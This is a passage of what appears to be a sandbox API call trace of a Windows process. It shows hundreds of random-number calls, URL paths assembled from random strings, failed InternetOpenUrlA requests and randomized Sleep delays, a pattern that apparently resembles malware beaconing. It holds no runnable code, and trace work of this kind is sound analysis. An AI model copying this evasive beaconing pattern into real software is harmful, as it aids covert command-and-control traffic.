pbBuffer=0x3a1b251, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0265.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.281] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.282] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.282] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0265.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0265.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b266, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a1b266) returned 0x0 [0265.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.291] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.291] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.291] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.291] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.292] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.292] GetProcessHeap () returned 0x440000 [0265.292] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0265.292] lstrcpyA (in: lpString1=0x473350, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0265.292] lstrcatA (in: lpString1="\x81\x03", lpString2="/tti0n7x1jCsewvUUbPy9/RvS64jk1QbNpj3cGuj9equcrtashdwv1fJwoz80wt79yy2/" | out: lpString1="\x81\x03/tti0n7x1jCsewvUUbPy9/RvS64jk1QbNpj3cGuj9equcrtashdwv1fJwoz80wt79yy2/") returned="\x81\x03/tti0n7x1jCsewvUUbPy9/RvS64jk1QbNpj3cGuj9equcrtashdwv1fJwoz80wt79yy2/" [0265.292] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0265.292] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/tti0n7x1jCsewvUUbPy9/RvS64jk1QbNpj3cGuj9equcrtashdwv1fJwoz80wt79yy2/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0265.292] GetProcessHeap () returned 0x440000 [0265.292] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473350 | out: hHeap=0x440000) returned 1 [0265.292] GetProcessHeap () returned 0x440000 [0265.292] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0265.292] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0265.293] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0265.293] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0265.293] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0265.293] Sleep (dwMilliseconds=0x18332) [0265.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0265.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0265.464] GetProcessHeap () returned 0x440000 [0265.464] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f50f0 [0265.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0265.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f50f1, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x4f50f1) returned 0x0 [0265.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0265.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.467] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.467] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.468] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.469] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.470] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.675] GetProcessHeap () returned 0x440000 [0265.675] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0265.675] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0265.675] lstrcatA (in: lpString1="\x04", lpString2="/ykrGhCi1arzno7otnh1fBru/" | out: lpString1="\x04/ykrGhCi1arzno7otnh1fBru/") returned="\x04/ykrGhCi1arzno7otnh1fBru/" [0265.676] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0265.676] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/ykrGhCi1arzno7otnh1fBru/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0265.676] GetProcessHeap () returned 0x440000 [0265.676] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0265.676] GetProcessHeap () returned 0x440000 [0265.676] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f50f0 | out: hHeap=0x440000) returned 1 [0265.676] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0265.677] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0265.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0265.677] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0265.677] Sleep (dwMilliseconds=0x1961e) [0266.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0266.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.029] GetProcessHeap () returned 0x440000 [0266.029] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0266.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0266.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.062] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 